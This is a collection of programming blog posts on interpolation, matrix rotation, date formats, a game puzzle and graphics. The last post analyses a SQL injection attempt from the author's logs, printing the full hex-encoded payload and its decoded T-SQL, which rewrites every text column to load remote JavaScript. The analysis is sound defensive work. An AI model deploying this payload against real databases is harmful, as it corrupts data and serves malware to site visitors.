Linear and cubic interpolation

Interpolation is a method of calculating a value from a set of given values. We’ll be looking at interpolation with a bias towards image processing, but the theory can be generalised for other purposes. You’ve probably already solved some interpolation problems without knowing it. Let me give you an example.

A distance problem

Suppose there are 3 towns A, B, C and they happen to lie on a straight line, in that order. B is 5 kilometres away from A, and C is 15 kilometres away from A. If you travel one quarter of the way from town B to town C, how far are you from town A?

Distance problem

To solve it, you can figure out the distance between B and C, which is 15 – 5 = 10 km. One quarter of the way means 1/4 * 10 = 2.5 km. Then add the distance between A and B to this and you have 5 + 2.5 = 7.5 km.

Linear interpolation

If you visualise the problem as interpolating between 2 points, then B becomes the point p0 with a value of 5 (km) and C becomes the point p1 with a value of 15 (km). The usual variable used is t, so the generic formula is:
f(t) = (1 – t) * p0 + t * p1, where t lies between 0 and 1 inclusive.

Using this, we have
f(1/4) = (1 – 1/4) * 5 + 1/4 * 15
= 3/4 * 5 + 1/4 * 15
= 7.5

This is linear interpolation. Linearity refers to the power of the variable t, which is 1. Note that there’s no stopping you from using negative values of t or values greater than 1.

Suppose you travelled from B to A one quarter of the distance between B and C. How far are you from town A?
f(-1/4) = (1 – (-1/4)) * 5 + (-1/4) * 15
= 5/4 * 5 – 1/4 * 15
= 2.5

Suppose you travelled from B to C and went past C by a quarter of the way. How far are you from town A?
f(5/4) = (1 – 5/4) * 5 + 5/4 * 15
= -1/4 * 5 + 5/4 * 15
= 17.5

What happens if you get a negative result?
f(-1) = (1 – (-1)) * 5 + (-1) * 15
= 2 * 5 – 15
= -5

It means you’re 5 kilometres away from town A. You’re just in the opposite direction from towns B and C. The calculation result is correct. It’s how you interpret the value.

Applications in image processing

A common operation in image processing is manipulating height maps. Height maps are usually greyscale bitmap files where a white pixel (RGB values are 255 for all 3) is the highest point, and a black pixel (RGB values are 0 for all 3) is the lowest point.

Terrain editor in Bryce

You know enlarging photographs can give you some weird results. What happens is you’re trying to fill in the blanks in a larger image using values from the original image. Where do you think the image editing software comes up with values? Interpolation.

If you think of the red, green and blue values of image pixels as 3 different “height maps”, then you’re just performing interpolation on 3 values. Suppose we’re talking about linear interpolation between two pixels. You’ll interpolate between the red component of the 2 pixels and get a value. Similarly you do it for the green and blue components. The calculated results of the red, green and blue become the interpolated colour.

Cubic Bezier interpolation

There are all kinds of cubic curves available. The Catmull–Rom spline, the non-uniform rational B-spline (NURBS) and I didn’t really want to write anything on the subject after I remember my Hermite splines… I love Bezier curves though, so I thought maybe I can write something with that.

Instead of 2 points used in linear interpolation, cubic interpolation uses 4 points. To illustrate, suppose you’re on an undulating plain with small hills undulating in their usual carefree manner. You’re in between two such (undulating) hills and you want to find out how high you are.

Instead of linear interpolating your way through these two (undulating) hills, the better way will be to interpolate with another 2 (undulating) hills! Ok, I’m stopping with the undulating thing…

Undulating hill interpolation

The Bezier curve equation looks like this:
B(t) = (1-t)^3 * p0 + 3*(1-t)^2 * t * p1 + 3*(1-t)* t^2 * p2 + t^3 * p3
where p0, p1, p2, p3 are the (height) values, and t lies between 0 and 1 inclusive.

You will be between p1 and p2. Let’s also assume that the hills are equidistant from each other. Like the pixels on an image, the hills shall be of equal distance from its neighbour.

Because of this equidistant property, p1 is 0.33 (roughly 1/3) units away from p0, p2 is 0.67 (roughly 2/3) units away from p0 and p3 is 1 unit away from p0.

How do you know what’s the value of t to use? You might be able to calculate the t if you do linear interpolation between p1 and p2. But that t value is different from the t value in the Bezier curve.

Ahhh… once you get the t-linear value, you interpolate with 0.33 and 0.67 to get the t-Bezier value. Confused? Suppose you’re one quarter way from p1 to p2. Your t-linear value is 1/4. Interpolate that with 0.33 and 0.67 to get
f(1/4) = (1 – 1/4) * 0.33 + 1/4 * 0.67
= 0.415

And 0.415 is your t-Bezier value. Voila!

You skipped the quadratic power!

I know. It’s logical to think that there’s a power 2 somewhere. But there isn’t. There is one fundamental flaw with quadratic interpolation. Which segment do you use?

Quadratic interpolation has issues...

In closing

Interpolation is just a method of creating data values using a set of existing data. What those created values mean is up to you to interpret.

In image processing, interpolation can be used to fill in blanks when enlarging an image. It doesn’t guarantee that the enlarged image looks good. Image processing is very much an aesthetic-based operation. I’ll talk a bit more on this when I get to writing code to rotate images.

Solving the Resident Evil Zero game math puzzle

Previously,

On the screen is shown a “00/81”. A number pad with number keys 1 to 9 is on the right. When a number key is entered, a knob is lit in red and the value of the number is added to the numerator of the displayed ratio. There are 10 unlit knobs.

The puzzle should be obvious. Match the numerator and the denominator with 10 entries.

So how would I solve it? My hint as stated, was:

the last entry is the most important

The first 9 entries are to get you as close to the required number as possible. This is actually similar to blackjack, a card game where you try to get as close to 21 points as possible without going over. The difference is that you don’t get to choose your next number (or card value) in blackjack. You do here.

Blackjack
[image by pavlen]

So my first instinctual thought was to finish up the first 9 entries to get to the last entry. My second instinctual thought was to make these 9 entries all the same number value. It’s a timed effort. I don’t have time to go figure out different combinations of sums.

Based on those thoughts, my next (instinctual) step was to divide the required number by 9, rounding down to nearest integer. Don’t ask me why at this point, because I’ll know the reason only after thinking it through, and I’m not thinking it through at this point.

So we have 81 divide by 9, and rounded down, we get 9. We have a problem. It’s not just 9. It’s exactly 9. There’s no number value 0 for the final entry. So we use 8 (1 less than 9).

Then we multiply 8 by 9 (entries) to get 72. And then 81 (required number) – 72 is 9, the final entry. So the answer is 8,8,8,8,8,8,8,8,8,9.

This method gives the simplest of combinations (only 2 distinct numbers used) and is the fastest to get you to the end point, the final entry. It’s the final entry that “corrects” the sum to the required number.

I have to say, the changing of 9 to 8 is (I’m starting to use the word generously) instinctive. I don’t know how changing 9 to 8 would solve the problem. I just know.

Let’s use this method on the second part of the puzzle: 67.

67 divide by 9 rounded down gives 7. 7 multiplied by 9 is 63. 67 – 63 is 4. So the answer is 7,7,7,7,7,7,7,7,7,4.

There you have it, the algorithm to solving the math puzzle. The second puzzle uses the “normal” mode of the algorithm. The first puzzle tested the edge case of the algorithm.

Hmm… can we write a function that spits out the combination using the above algorithm? Can we write a function that spits out all possible combinations?

Messy indices on the right please

In case you don’t know, indices are the plural form of index. Wait, isn’t the plural form of index, indexes? Well, indexes is the plural form, if you’re talking about database table indexes (I’m confused at first too). I’m referring to the offset of an array, the index of an array.

So what do I mean by messy indices on the right? Variable assignment. I mentioned something of this in the matrix rotation article, and I want to talk more on it here. And I will tell you why I prefer them on the right side of the assignment. First, I need to mention raytracing.

Tracing a light ray from the eye back to the scene

In 3D graphics, a scene is rendered and you need to know what colour each resulting pixel is. You can throw light rays everywhere, let them hit an object, bounce off that object, and continue bouncing and if that ray happen to shoot through to the camera, render it. That doesn’t sound very efficient, does it?

There are millions of light rays to shoot from a light source. They can bounce off objects in any number of ways. And only a small percentage of them will ever enter the camera.

Raytracing simplified

What you can do is, start from the camera. Trace a ray from the camera through the resulting pixel, back out into the scene and see what it hits. If it doesn’t hit an object, it will travel all the way into the sky or space. Render accordingly. If it does hit an object, continue to track the bounced (or reflected) ray until it hits nothing. Or hit a light source. Either way, you know how to render the colour. It’s a bit more involved than that, and I’m simplifying the explanation.

Basically you start from the end.

Rotating the square matrix

Let’s revisit that rotating-the-matrix problem.

For Y = 0 to 3
    For X = 0 to 3
        Destination(3-Y,X) = Source(X,Y)
    Next
Next

Essentially, the author concentrated on the source, iterating through it with appropriate indices and assigning those values to the destination. See how “messy” the indices on left side are? I call it, the “throw values over” assignment:

Throwing values over

Then there’s the raytracing way, the “finding values” way:

Finding values assignment

There doesn’t seem to be any difference between the two. Until I tell you about rotating images…

Rotating an image 30 degrees clockwise

Suppose you want to rotate an image in non-right-angled degrees, say 30 degrees clockwise.

Rotated image outside rectangle

We can discuss the code to rotate the image some other time. Hmm… new article fodder…

Anyway, you can start from the source image, iterating through each pixel and “throw values” to the destination image. Or you can start iterating the destination image and “find values” from the source image. Each method requires you to check the boundaries of the image (index must be within width and height).

If both seem equivalent, what’s the problem? Image quality.

You see, with the algorithm involved, there’s the possibility that you’d throw different pixels from the source image onto the same pixel on the destination image. You’d be doing sine’s and cosine’s and rounding the calculation into an integer so you can map it to an index. This isn’t good, since you can override a previous calculation.

With the “find value” way, you have a similar problem. There’s the possibility that for different pixels on the destination image, you’d map back to the same pixel on the source image. However, you don’t have to use the exact colour of that source pixel. You can use interpolation to get a sort of “average” colour from the surrounding pixels.

You know, I should write something on the image rotation part. Alright, coming up soon, an image processing article focused on image rotation!

And that’s the reason why…

I prefer the messy indices on the right side of the assignment. Because I start from the end (or destination), the iteration indices are “clean” on the left side.

And now, homework! See if you can come up with code (or algorithm) to rotate an image any number of degrees, assuming the rotation is about the image’s centre. You can make it easier by rotating about the top-left corner. And you have to iterate through the pixels, not use some in-built function to manipulate the image. You can also make the image black and white, so you focus on grey values instead of an RGB triplet, to make the code simpler to write.

If you’re adventurous, and want to try the interpolation thingy to make the resulting image look better, you can research on linear interpolation and cubic splines.

Can you solve this game math puzzle in seconds?

The game in question is Resident Evil Zero. Didn’t think there’d be a math puzzle in a survival horror game? Neither did I.

The game video footage (video link) is over 10 minutes long, so I’ll highlight the relevant parts. Warning: the player is uh, slightly liberal in his use of words. This video’s considered ok, comparing with his other videos. His commentary is colourful and funny, which is why I watch his videos. He makes surviving in a horror story, fun. *smile*

The player mentions a difficult math puzzle at about 1 minute 44 seconds (henceforth noted 1:44) into the video. That got my attention. A math puzzle in a game?

He even tagged it as such:

Stupid math puzzle

I watched the video till about 7:44, where the math puzzle finally made its entrance.

Resident Evil Zero math puzzle part 1

On the screen is shown a “00/81”. A number pad with number keys 1 to 9 is on the right. When a number key is entered, a knob is lit in red and the value of the number is added to the numerator of the displayed ratio. There are 10 unlit knobs.

The puzzle should be obvious. Match the numerator and the denominator with 10 entries.

This is the math puzzle?! Still, in an action game, any kind of math puzzle is probably fatal. I can fumble on simple additions too. Guess I need to practise more.

Anyway, his answer was 9,9,9,9,9,9,9,8,7,3 for a total of 81. Puzzle solved. Wait, there’s more.

Resident Evil Zero math puzzle part 2

In the second part of the puzzle (at about 8:13), the numerator was obscured. The denominator was 67. This time, the player had to really know what he should enter before entering anything. He fumbled for the right combination for about 2 minutes. And he hadn’t saved the game since the beginning of the game…

With about 20 seconds left on the clock, he finally solved it. His answer was 5,5,5,5,9,9,9,9,3,8 for a total of 67.

So my challenge to you is, can you quickly come up with a solution in a timed situation? How would you solve the problem? What goes through your mind while you’re coming up with an algorithm for it?

I’d love to hear your thoughts and comments. I’ll publish what my thoughts are too (some days later). Hint: the last entry is the most important.

You’re most welcome to submit well thought solutions in pseudocode too, eliminating the limited time factor.

When even screenshots fail

My best weapon for handling user queries is the screenshot.

User: Hey Vincent, I’ve got an error when doing X.
Me: Send me a screenshot.

User: Hi Vincent, sorry to disturb you. The application Y doesn’t work.
Me: Send me a screenshot.

User: Dear Sir, I cannot log in to application Z. Please advise.
Me: Send me a screenshot.

I’ve been fortunate in that I don’t have to educate my users on how to create a screenshot. Imagine the conversation with me describing where the PrintScreen button is…

User: Uh, how do I send you a screenshot?
Me: Just do a PrintScreen.
User: How do I do a PrintScreen?
Me: Just press the PrintScreen button.
User: What PrintScreen button?
Me: It’s a button on the top right corner of your keyboard, beside the Scroll Lock button.
User: Ok, I’ve pressed the PrintScreen button. Now what?
Me: Now send me the screenshot.
User: How do I do that?

I’d probably slam the phone down and throw it halfway across the hall.

PDFs, Word documents and bitmap files

Anyway, even with the absence of the kind of inane conversation above, I still receive some interesting emails. I might receive an email with a PDF file. I open the PDF file and lo and behold, there’s a screenshot inside, all shiny and black and white and kinda fuzzy and grainy due to the warping from the PDF writing software.

Yes, there are users who are more adept at creating PDFs than Word documents.

Then there are screenshots where the user diligently took a capture of the screen. With the actual error obscured by another window.

Then there are the emails with a file size of 2 megabytes. Think bitmap file attachments with a resolution of 1024 by 768 pixels.

Then there are the clever users who took a screenshot, and to compress the file size, they dumped the contents into a Word document. Word automatically compresses the bitmap. I can’t blame them for not knowing how to use an image editor, even one as simple as Windows Paint. Didn’t get any fancy meta-screenshots, though I’ve gotten a screenshot in a PowerPoint file before.

Then there are the ultra-clever users who know how to take a screenshot, use an image editor to crop it, and *exclaim* save it as JPG or PNG. Even then there are problems. Let me first show you this:

Yellow screen of death

If you’re familiar with ASP.NET, that’s everybody’s favourite error screen. It has useful data such as the general error message, the line of code where the error occurred and the stack trace. The stack trace contains information such as what events were triggered so you know for example, which button was clicked.

Now I have this web application with a loading screen, played out with an animated GIF image. And when there’s an error, something like this shows up:

ASP.NET error with Now Loading

I’m terrible at drawing stick figures… It’s supposed to be a stick figure searching for files in a file cabinet, and throwing any useless files behind him.

Well, my user sent me that. Most of the useful information was below the screen. So I asked her to scroll down so I could see them.

Me: Can you scroll down and resend the screenshot?
User: How to scroll down?
Me: Just use the scrollbar and scroll down.
User: What scrollbar?

That’s the compressed version of a few emails back and forth. I didn’t quite throw my phone across the hall, but I did take a deep breath and drink some water.

Then I took her screenshot and added some comments in it.

ASP.NET error screen with comments

I accompanied that modified screenshot with more comments in my email. I can’t remember what I typed, so here’s the closest version:

Hi,

I’m sure the man throwing files all over the place is all very nice, but I can’t see the actual error below him. Please scroll down so I can see more of the error message.

Regards,
Vincent

Sometimes, you’re not just debugging code. You’re debugging human behaviour.

Date and time format mistakes in .NET and SQL

I’ve written about how you can manipulate dates and times in .NET before. Here, I’m going to highlight a few avoidable mistakes when manipulating them in .NET and in SQL for database queries.

Case matters

I’m not going to list down all the format strings you can use. Refer to this list instead. You might find this article by Microsoft on best practices useful. I am going to highlight these two letters, h and m.

The small “h” gives you the hour, in 12-hour notation without a leading zero (for less than 10 values). “hh” gives you the 12-hour representation with a leading zero.

The capital “H” gives you the hour in 24-hour notation (or military time) without a leading zero, and “HH” gives you the 24-hour representation with a leading zero.

It’s good user-friendly practice to include the “t” or “tt” notation if you’re using the small “h” to represent the hour (for “A” / “P” or “AM” / “PM” respectively). This way, you know if it’s in the morning or night.

The letter H isn’t so bad. At least you’re still referring to the hour. When you get to M, oh you better watch out.

The small “m” and “mm” gives you the minute (of the time) without and with a leading zero respectively.

The capital “M” and “MM” gives you the month without and with a leading zero respectively. For example, September would be 9 and 09 respectively. See, totally different thing from its small lettered counterpart. There’s the “MMM” and the “MMMM” format string, and I’ll leave it to you to experiment with it.

Now to a common mistake I see: “dd/mm/yyyy“. See any problems?

I’m going to give you a starter custom format string: “dd/MM/yyyy HH:mm:ss“. Burn that into your brain. You can swap “dd” and “MM” if you want. Use “-” instead of “/” as the separator if you want.

The TO_CHAR() function in Oracle PL/SQL

For the equivalent SQL statement to format dates and times in Oracle, here it is:

TO_CHAR(sysdate, 'DD/MM/YYYY HH24:MI:SS')

Note that the function parameter is case insensitive.

Note the difference between “MM” for month and “MI” for minute. For a 12-hour representation, use “HH” or “HH12”.

Tricky formats in Sybase and SQL Server

I don’t know why Sybase and SQL Server don’t just give the ability to easily customise date and time formats. Instead of the string formats in .NET and PL/SQL, they use number codes. Number codes! *urgh*

I actually have a table of the codes and the resulting formats printed out and placed beside my desk, somewhere buried in the chaotic mess of papers. I really just remember 3 number codes: 103, 112 and 120.

select convert(char(10), getdate(), 103)
-- gives something like 17/09/2008 in dd/MM/yyyy format
select convert(char(8), getdate(), 112)
-- gives something like 20080917 in yyyyMMdd format
select convert(char(19), getdate(), 120)
-- gives something like 2008-09-17 05:04:03 in yyyy-MM-dd HH:mm:ss format

I’m using the .NET format string notation in the comments. Note that number code 120 is only available in SQL Server. The other 2 codes are available in both Sybase and SQL Server. There are other codes (which you can explore here). I just frequently use those 3, particularly 112.

If you’re used to the American date display, then this might be useful:

select convert(char(10), getdate(), 101)
-- gives something like 09/17/2008 in MM/dd/yyyy format

Note that you can do something like

select convert(char(6), getdate(), 112)
-- gives something like 200809 in yyyyMM format

Note the char(6) part (versus char(8) originally). I do this quite often too.

Now for the mistake in T-SQL. What do you think is wrong with this?

select convert(char(10), EFF_DATE, 103) EFF_DATE
from Customers
order by EFF_DATE desc

Yes, I’m being deliberately vague. Use your powers of deduction to fill in the blanks.

Move closer or shrink FOV?

There was this question posed by my professor in a computer graphics class. It was for bonus points (we love them, don’t we?) and sadly, I didn’t give a satisfactory answer. And to this date, I still don’t know what the answer should be.

To elaborate, first I need to explain what field of view or FOV is. Humans have an FOV of almost 180 degrees. For 3D graphics and computer games, it’s typically 90, 60 or 45 degrees (helps with cutting down processing calculations). What is it?

Simple illustration of field of view

Suppose you’re standing somewhere looking at a scene. You notice something in the distance, and you want to take a closer look or zoom in. For the purposes of this example, let’s just assume you have some bionic superpower that enables your eyes to function like a camera/binoculars thingy.

There are two ways to go about doing this. You can physically move closer. Or you can shrink your FOV. A smaller FOV means less is visible, but whatever is visible is enlarged, so to speak. Either way, the object of your attention becomes larger.

Move closer or shrink FOV?

The resulting rendered scene is of the same “width” in both cases. The object is enlarged in both cases. The question was, what’s the difference between moving closer and shrinking the FOV?

Let’s look at a normal rendered scene.

Scene with normal perspective

If we move closer and keep the FOV at 60 degrees, we get this:

Scene with camera closer

If we stay where we are and change the FOV to 45 degrees, we get this:

Scene with smaller FOV

Using the tree and cube to act as reference points, and the mountain as backdrop, can you spot the difference?

Now that I think about it, the answer probably has some similarities to the concept of ray tracing. Instead of having light reflecting off objects and enter your eye, think about shooting back rays from the eye towards the scene.

I guess I’ll have to talk more on this. Please share your answer and we can compare notes. Stay tuned.

Featured demo – the.popular.demo

Today’s featured demo is the Popular demo (video link), by Farbrausch. This is one of my favourites, and is one of the few demos I’ve seen that has vocals in it. It’s about 4 minutes in length and 8.2 MB in size (download page at Pouet).

Why is called the popular demo? Because there’s disco. *smile* The central object of attention is a 3D figure model textured with disco ball bling. The music track is upbeat, and I found myself moving to the groove, if you know what I’m saying. You should watch this demo to listen to the music if nothing else. It’s that awesome.

Here are the lyrics to the vocals:

Tonight tonight, it’s all in motion,
Can’t feel the gravity.
Tonight tonight, what is this potion
That makes a fool of me?
Tonight tonight, I’m seeing stars –
I’m blind with love.
Tonight tonight, we’re Venus and Mars
Winking from above.

Tonight tonight, I feel like moving;
Like flying endlessly.
Tonight tonight, the city’s grooving –
They’re dancing all for me.
Tonight tonight, the perfect night,
The only one.
Tonight tonight, I’m holding you tight;
Tomorrow you will be gone…

I was surprised that I understood the lyrics differently. Yes I have my very own Mondegreen! Actually thought I was correct on at least the first verse…

Anyway, remember the 3D figure model? Animating the figure requires some logic. You know, where the feet go, where the elbows bend and so on.

For example, at the start of the demo, the figure is revealed and comes out of the lift/cylinder and walks down the stairs. That should be one “action sequence”. Then the demo smoothly transitions to show the “fr-025” title and the figure is moving again, this time on another action sequence.

Question: In the entire demo, how many distinct action sequences do you count?

Rotating a matrix cannot be done with matrix multiplication

Note that this is different from rotation matrices in our previous discussion on transformation matrices. We were rotating (3D) objects and vertices (points) then. We’re talking about rotating a matrix here.

I read this article by Raymond Chen discussing the rotation of a 2 dimensional array (which is equivalent to a matrix in our case). In it, he stated:

The punch line for people who actually know matrix algebra: Matrix multiplication doesn’t solve the problem anyway.

Yeah, I’m one of those people.

I’ve never quite thought about it before, so I decided to explore it further. Why can’t matrix multiplication be used?

Before we go into that, let’s look at a reference link in the above article from which this whole topic came about. In it, Chris Williams (the author) gave some code for rotating a matrix. I’m not sure what he referred to by “left” and “right” turn because I feel it’s a bit ambiguous.

Duty calls by XKCD

Anyway, the code on the left turn is wrong. This is what’s given:

' For LEFT turns

For Y = 0 to 3

    For X = 0 to 3

        Destination(Y,X) = Source(X,Y)

    Next

Next

That is the algorithm for transposing a matrix.

He also gave code for the “right” turns, which is correct. I prefer to have “messy” indices on the right side of the assignment. To each his own…

Anyway, here’s what I came up with:

const int cnSize = 4;
int[,] Source = new int[cnSize, cnSize];
int[,] Destination = new int[cnSize, cnSize];
int i, j;

Console.WriteLine("Source matrix:");
for (i = 0; i < cnSize; ++i)
{
    for (j = 0; j < cnSize; ++j)
    {
        Source[i, j] = i * cnSize + (j + 1);
        Console.Write("{0:d2} ", Source[i, j]);
        Destination[i, j] = -1;
    }
    Console.WriteLine();
}
Console.WriteLine();

Console.WriteLine("Using given 'clockwise turn' formula");
// given left turn
for (j = 0; j < cnSize; ++j)
{
    for (i = 0; i < cnSize; ++i)
    {
        Destination[j, i] = Source[i, j];
    }
}
for (i = 0; i < cnSize; ++i)
{
    for (j = 0; j < cnSize; ++j)
    {
        Console.Write("{0:d2} ", Destination[i, j]);
    }
    Console.WriteLine();
}
Console.WriteLine();

Console.WriteLine("Using corrected 'clockwise turn' formula");
// correct given left turn
for (j = 0; j < cnSize; ++j)
{
    for (i = 0; i < cnSize; ++i)
    {
        Destination[j, cnSize - 1 - i] = Source[i, j];
    }
}
for (i = 0; i < cnSize; ++i)
{
    for (j = 0; j < cnSize; ++j)
    {
        Console.Write("{0:d2} ", Destination[i, j]);
    }
    Console.WriteLine();
}
Console.WriteLine();

Console.WriteLine("Using given 'anticlockwise turn' formula");
// given right turn
for (j = 0; j < cnSize; ++j)
{
    for (i = 0; i < cnSize; ++i)
    {
        Destination[cnSize - 1 - j, i] = Source[i, j];
    }
}
for (i = 0; i < cnSize; ++i)
{
    for (j = 0; j < cnSize; ++j)
    {
        Console.Write("{0:d2} ", Destination[i, j]);
    }
    Console.WriteLine();
}
Console.WriteLine();

Console.WriteLine("End of program");
Console.ReadLine();

I said you'd have to get used to nested for loops, didn't I? *smile* The output looks like this:

Rotating a matrix

Ok, back to the issue at hand. Let me phrase the question as "Is there a general transformation matrix that rotates a square matrix with size N (N > 1) clockwise?" I'm going to try answering that question using proof by contradiction.

Suppose there is such a transformation matrix. Without loss of generality, we'll assume N to be 2. So there is a 2 by 2 matrix A such that

[ A(0,0)  A(0,1) ]  [ a  b ]  =  [ c  a ]
[ A(1,0)  A(1,1) ]  [ c  d ]     [ d  b ]

Let's look at the top left and top right entries of the resulting matrix, which gives us two simultaneous equations:
A(0,0)a + A(0,1)c = c
A(0,0)b + A(0,1)d = a

Taking the 1st equation, we have
A(0,0)a = c - A(0,1)c

Dividing both sides by a, we have
A(0,0) = (c/a) * (1 - A(0,1))

You might find this ok, but take a look at the (c/a) part. This assumes that a is non-zero. Think about that. Our general transformation matrix assumes that the top left entry "a" to be rotated is non-zero. Hmm... Let's continue for a bit.

Substituting the value of A(0,0) into the 2nd equation, we have
b*(c/a)*(1 - A(0,1)) + A(0,1)d = a

Do the algebraic simplifications, and we'll get this
A(0,1) = (a^2 - bc) / (da - bc)

Take a look at the denominator. This assumes that (da - bc) is non-zero. If you have some knowledge of matrices, this is the determinant of the matrix.

So, our general transformation matrix assumes that the top left entry is non-zero and the determinant of the 2 by 2 matrix to be rotated is non-zero. Do you see problems yet? And we're not even looking at the other 2 simultaneous equations yet...

We have arrived at a contradiction. Our "general" transformation matrix isn't general at all. There are hidden assumptions. This means there's no such general transformation matrix for rotating a matrix.

Q.E.D.

I feel my proof given above is kinda weak. Maybe you can come up with a stronger proof?

Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning, long horizontal scrolling ahead. Please click through to post for easier reading):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
int i;
char c;
for (i = 0; i < s.Length; i += 2)
{
    c = Convert.ToChar(Convert.ToInt32(string.Format("0x{0}{1}", s[i], s[i + 1]), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That might not be the best way to manipulate hexadecimal, but you should definitely not follow this example.

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 corresponds to ntext, text, nvarchar, varchar respectively.

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command in executed. Basically, it updates all the text columns in all the user-created tables to a "certain value". Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, so it becomes just one single quote because of the SQL escape. Then it ends with double quotes and a greater than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the lost of data in the text columns, which is probably not as fatal as the Javascript.

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.